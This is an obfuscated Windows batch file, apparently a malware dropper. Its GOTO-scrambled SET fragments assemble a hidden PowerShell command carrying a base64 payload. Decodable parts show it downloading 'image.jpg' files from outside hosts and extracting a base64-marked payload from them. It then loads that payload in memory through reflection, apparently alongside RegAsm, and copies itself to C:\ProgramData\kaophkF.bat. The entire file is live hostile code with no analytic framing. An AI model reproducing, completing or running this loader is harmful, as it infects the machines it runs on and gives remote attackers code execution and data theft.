@echo off
GOTO IDGFFDGDJF
:IDGFFDGDJF
SET UDSGFDGIDD=%SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell.exe -Command "Star
GOTO GFJIUUIFGH
:NFJDNFGFNH
SET GGUFGFFGIF=G0ALAAoAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEIAaQBuAGQAaQBuAGcARgBsAGEAZwBzA
GOTO KOJIFDDFJG9
:IIFFOIDNGD
SET JJSGIDDGGN=MALABJAG4AcwB0AGEAbgBjAGUAJwApACkAOwAkAG8APQBpAGYAKAAhACQAbgAuAEkAcwB
GOTO FGGJKNHFNS1
:JFOSFGGDOO
SET NSJHGNFOJH=AGQAYQBhAHUAcgBhAC4AcwB0AG8AcgBlAC8AaQBtAGEAZwBlAC4AagBwAGcAJwApAC
GOTO FGGJKNHFNS5
:NOIGSSFHNS
SET GGDOIDNOGH=gBhAFcANQBuAEkARgBOADUAYwAzAFIAbABiAFMANQBTAFoAVwBaAHMAWgBXAE4AMABhAFcAOQB1AE8
GOTO FODDDDHOGG
:OJODGNIJJN
SET GGJOJOGFOH=ABCAEEAUwBFADYANABfAEUATgBEAD4APgAnACkAewANAAoAIAAgACAAIABpACAA
GOTO OFJHFDDOIO
:OOUIIGDIID
SET JNKDIKGOIN=QAZQBJAG4AcwB0AGEAbgBjAGUAKAAkAHIAKQB9ADsAJABuAC4ASQBuAHYAbwBf#AGUA
GOTO FGGJKNHFNS3
:NFNIINHIIF
SET SGDDGFDFKI=AZQBzAHMAfABzAG8AcgB0ACAAQwBQAFUAIAAtAGQAZQBzAGMAfABzAGUAbABlAGMAdA
GOTO GNDFGFFIGN2
:HGISDGINSO
SET DHNGGOKONO=ZAAoACQAbAApAHsAJAB3AD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAG
GOTO KOJIFDDFJG0
:IFKDODDJNF
SET FGGJGNOOID=GkAQgBCAGMASABCAEUAYgAyADEAaABhAFcANAB1AFEAMwBWAHkAYwBtAFYAdQB
GOTO GJOFFOFSID
:DJDGFNIIKG
SET DGIGIUNGGN=                
GOTO GNDFGFFIGN9
:IGGGIKIGOI
SET GFKJOUNFOG=CwAIAAnAGsAYQBvAHAAaABf#AEYAJwAsACAAJwBSAGUAZwBBAHMAbQAnACwAI
GOTO GNDFGFFIGN0
:KOJIFDDFJG
SET HDSJODHGFJ=-WindowStyle Hidden -ArgumentList '-Command \"$ddsdgo = ''DQAKAFMAdA
GOTO FGGJKNHFNS
:NNKSNGFDGG
SET GGGGOSDDUO=AGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG
GOTO DFJSJDOJJG
:GOFIFININN
SET SFFNSFGOSI=ADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AKAAuACoAPwApADwAP
GOTO OJODGNIJJN
:GODGDHGUIO
SET GGGIKNDODI=WgBXADEAaQBiAEgAawBvAFkAbgBsADAAWgBWAHQAZABJAEcARQBwAGUAMwBKAGwAZABIAFYAeQBiA
GOTO IFKDODDJNF
:KOJIFDDFJG6
SET UIINNDFDGN=D0AJAB5AC4ARwBlAHQAVAB5AHAAZQBzACgAKQB8AD8AewAkAF8ALgBGAHUAbABsAE4AYQBtAGUAIA
GOTO KOJIFDDFJG7
:DGNHJNFFNF
SET JGKOIDGONN=MAaABlAGwAbAAuAEgAbwBhAGEAYQBhAGEAYQBzAGQAbQBlACcAIAAnAGwAZgBzAGcAZQ
GOTO ONIJGJFFDS5
:KGFGHFIJNJ
      
GOTO DJDGFNIIKG
:KOJIFDDFJG0
SET OFUNJNGIGF=IAQwBsAGkAZQBuAHQAOwAoAEcAZQB0AC0AUgBhAG4AZABvAG0AIAAkAGwAIAAtA
GOTO KOJIFDDFJG1
:FFOODGDSGO
SET FIHNSDIFNI=QAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgACgAWwBU
GOTO NNKSNGFDGG
:KOJIFDDFJG4
SET GSOONDDODI=GEALAAkAHQALAAkAG0ALAAkAHAAPQBAACgAKQApAHsAJAB5AD0AWwBEAG8AbQBhAGkAbgBMAG
GOTO KOJIFDDFJG5
:KOJIFDDFJG3
SET FGFJSINJNH=H0AYwBhAHQAYwBoAHsAfQB9AH0ADQAKAGYAdQBuAGMAdABpAG8AbgAgAGkAKAAkA
GOTO KOJIFDDFJG4
:GGUISGNNDN
SET IJIKGOGODJ=AOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABnACkAKQAtAG0AYQB0AGMAaAAn
GOTO GOFIFININN
:UGFGGDGDOF
SET GJJGGDKHII=jAHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAVAB5AHAAZQBdADoAOgBUAGwAcwAxADIADQAKACQAY
GOTO KGGDIDHGJI
:JIFJDDOJGS
SET GDUDKDIGFN=AHIAYQBkAG8AeAAuAGMAbwBtAC8ASQByAGkAbwB6AGIARABaAC8AaQBtAGEAZwBlAC4AagBw
GOTO NNNJIIFOGU
:GNGNOJDGKD
SET SFONOJNNKO=AWABSAHAAWQB5AEIAQgBjADMATgBsAGIAVwBKAHMAZQBTAEIATQBiADIARgBf#AFEAWABOAHoA
GOTO GODGDHGUIO
:GJOFFOFSID
SET IJDDDDKNJO=kAEUAUgB2AGIAVwBGAHAAYgBpADUATQBiADIARgBf#AEsARwBFAHAATwAzADEAOQAnAA0ACgBBAG
GOTO FFOODGDSGO
:SDFFISIGFN
SET INDIFDHGHF=.GetString([system.convert]::Frombase64string([regex]::Replace
GOTO GNDFGFFIGN5
:OFJHFDDOIO
SET GNFOOIDSND=KABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQA
GOTO ONIJGJFFDS3
:NNNJIIFOGU
SET IFODGGDNII=AGcAJwApACkADQAKAGkAZgAoACgAJABnAD0AZAAgACQAawApAC0AYQBuAGQAKA
GOTO FGGJKNHFNS8
:GNDFGFFIGN
SET NSDDOJGIGS=AHUAcgBpAHQAeQBQAHIAbwB0AG8AYwBvAGwAIAA9ACAAWwBOAGUAdAAuAFMAZQB
GOTO UGFGGDGDOF
:NDJOJDNOJG
SET JUDGGSKNNU=yAGkAbgBnACgAJABiADYANAApACkAKQANAAoAZgB1AG4AYwB0AGkAbwBuACAA
GOTO HGISDGINSO
:INKFOIODOF
SET GNJDINOIII=GEAVwA1AE0AYgAyAEYAawBaAFgASgA3AGMASABWAGkAYgBHAGwAagBJAEgATgAwAFk
GOTO GNGNOJDGKD
:KOJIFDDFJG2
SET INDGOODSOG=BlAHQAdQByAG4AIAAkAHcALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAXwApA
GOTO KOJIFDDFJG3
:FGGJKNHFNS
SET DFFJUJNDFS=BhAHIAdAAtAFMAbABlAGUAcAAgAC0AUwBlAGMAbwBuAGQAcwAgADUADQAKAFsATgBlAHQALgB
GOTO ONIJGJFFDS
:ONIJGJFFDS
SET SFGFDGOHNF=TAGUAcgB2AGkAYwBlAFAAbwBpAG4AdABNAGEAbgBhAGcAZQByAF0AOgA6AFMAZQBj
GOTO GNDFGFFIGN
:FODDDDHOGG
SET DOOKKJGDNI=AMwBCADEAWQBtAHgAcABZAHkAQgBqAGIARwBGAHoAYwB5AEIARQBiADIAMQBoA
GOTO INKFOIODOF
:FGGJKNHFNS1
SET ONDNGODDIU=TAHQAYQB0AGkAYwApAHsAWwBBAGMAdABpAHYAYQB0AG8AcgBdADoAOgBDAHIAZQBhAH
GOTO OOUIIGDIID
:GNDFGFFIGN2
SET HIGJJGGNSO=AgAC0AZgBpAHIAcwB0ACAANQB8AGYAdAAgAE4AYQBtAGUALABDAFAAVQAgAH0ADQAKAA0ACgAgA
GOTO GNDFGFFIGN3
:KOJIFDDFJG5
SET ODDNONJKGF=8AYQBkAGUAcgBdADoAOgBMAG8AYQBkAEEAcwBzAGUAbQBiAGwAeQAoACQAYQApADsAJAByA
GOTO KOJIFDDFJG6
:ONIJGJFFDS5
SET IGFINFHHIG=BkAGQAZABkAGQAZABkAGEAJwAgAEAAKAAnAHQAeAB0AC4ARgBJAGoAcABiAGYAUwAvAG4AaQBhAG0
GOTO ONIJGJFFDS6
:KOJIFDDFJG7
SET GKKNGFSFOF=AtAGUAcQAgACQAdAB9ADsAJABuAD0AJAByAC4ARwBlAHQATQBlAHQAaABvAGQAKAAkA
GOTO NFJDNFGFNH
:GNDFGFFIGN9
%UDSGFDGIDD%%OINDOFFFKD%%HDSJODHGFJ%%DFFJUJNDFS%%SFGFDGOHNF%%NSDDOJGIGS%%GJJGGDKHII%%DJGOINFNII%%GGDOIDNOGH%%DOOKKJGDNI%%GNJDINOIII%%SFONOJNNKO%%GGGIKNDODI%%FGGJGNOOID%%IJDDDDKNJO%%FIHNSDIFNI%%GGGGOSDDUO%%NNFGNOGODN%%JUDGGSKNNU%%DHNGGOKONO%%OFUNJNGIGF%%ISSOFHJNJJ%%INDGOODSOG%%FGFJSINJNH%%GSOONDDODI%%ODDNONJKGF%%UIINNDFDGN%%GKKNGFSFOF%%GGUFGFFGIF%%FFINKDONNI%%JJSGIDDGGN%%ONDNGODDIU%%JNKDIKGOIN%%DGSFGGJNNI%%NSJHGNFOJH%%NJGKKFOFSD%%GDUDKDIGFN%%IFODGGDNII%%NGGKGDSOSG%%IJIKGOGODJ%%SFFNSFGOSI%%GGJOJOGFOH%%GNFOOIDSND%%SISOGNJIKN%%JGKOIDGONN%%IGFINFHHIG%%GFSONFJIOH%%OOIGJIFGGG%%GGDNOHUGOS%%GFKJOUNFOG%%NHIDNFJFGD%%SGDDGFDFKI%%HIGJJGGNSO%%KGIJFDDFDS%%INDIFDHGHF%%SNNSIDHUUH%%NGGJKDGDIO%%DGIGIUNGGN%
GOTO UGFGGDGDOF0
:FGGJKNHFNS8
SET NGGKGDSOSG=AkAHQAPQBbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEY
GOTO GGUISGNNDN
:GNDFGFFIGN0
SET NHIDNFJFGD=AAnADEAJwAgACwAIAAnAHgAOAA2ACcAKQANAAoAIAAgACAAIABHAGUAdAAtAFAAcgBvAGM
GOTO NFNIINHIIF
:DFJSJDOJJG
SET NNFGNOGODN=4AZwAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAB
GOTO NDJOJDNOJG
:GNDFGFFIGN5
SET SNNSIDHUUH=($ddsdgo, ''f#'', ''r'')));iex $oWjuxd\"'";  Copy-Item -Path '%~f0' -Destina
GOTO GNDFGFFIGN6
:KOJIFDDFJG1
SET ISSOFHJNJJ=EMAbwB1AG4AdAAgACQAbAAuAEMAbwB1AG4AdAApAHwAJQB7AHQAcgB5AHsAcg
GOTO KOJIFDDFJG2
:ONIJGJFFDS8
SET GGDNOHUGOS=AG4AbwBjAHIAZQBzAHUAYgB1AGgAdABpAGcALgB3AGEAcgAvAC8AOgBzACcALAAgACcAMQAnA
GOTO IGGGIKIGOI
:GNDFGFFIGN3
SET KGIJFDDFDS=CAAIAAgACAAIAAgACAAIAAgAA=='';$oWjuxd = [system.Text.encoding]::Unicode
GOTO SDFFISIGFN
:KOJIFDDFJG9
SET FFINKDONNI=F0AJwBQAHUAYgBsAGkAYwAsAE4AbwBuAFAAdQBiAGwAaQBjACwAUwB0AGEAdABpAG
GOTO IIFFOIDNGD
:FGGJKNHFNS3
SET DGSFGGJNNI=KAAkAG8ALAAkAHAAKQB9AA0ACgANAAoAJABf#AD0AQAAoACgAJwBoAHQAdABwAHMAOgAvAC8AbQBv
GOTO JFOSFGGDOO
:KGGDIDHGJI
SET DJGOINFNII=gA2ADQAPQAnAGQAWABOAHAAYgBtAGMAZwBVADMAbAB6AGQARwBWAHQATwAzAFYAe
GOTO NOIGSSFHNS
:FGGJKNHFNS5
SET NJGKKFOFSD=wAKAAnAGgAdAB0AHAAOgAvAC8AYgBsAGEAYwBf#AG0AbwByAGUALgB0AHcAaQBsAGkAZwBoAHQAcABh
GOTO JIFJDDOJGS
:GFJIUUIFGH
SET OINDOFFFKD=t-Process %SYSTEMROOT%\System32\WindowsPowerShell\v1.0\powershell.exe 
GOTO KOJIFDDFJG
:GNDFGFFIGN6
SET NGGJKDGDIO=tion 'C:\ProgramData\kaophkF.bat' -Force -ErrorAction SilentlyContinue"
GOTO KGFGHFIJNJ
:ONIJGJFFDS6
SET GFSONFJIOH=ALwBzAGQAYQBlAGgALwBzAGYAZQByAC8AYQBvAGUAbQB1AG0AaQBnAC8AdgBlAGQALQAyADE
GOTO ONIJGJFFDS7
:ONIJGJFFDS3
SET SISOGNJIKN=cgBpAG4AZwAoACQATQBhAHQAYwBoAGUAcwBbADEAXQApACkAIAAnAHQAZQBzAHQAcABvAHcAZQByAH
GOTO DGNHJNFFNF
:ONIJGJFFDS7
SET OOIGJIFGGG=AMQB5AGwAcABlAHIAbwBtAGUAYwBpAGYAZgBvAC8AbQBvAGMALgB0AG4AZQB0
GOTO ONIJGJFFDS8
:UGFGGDGDOF0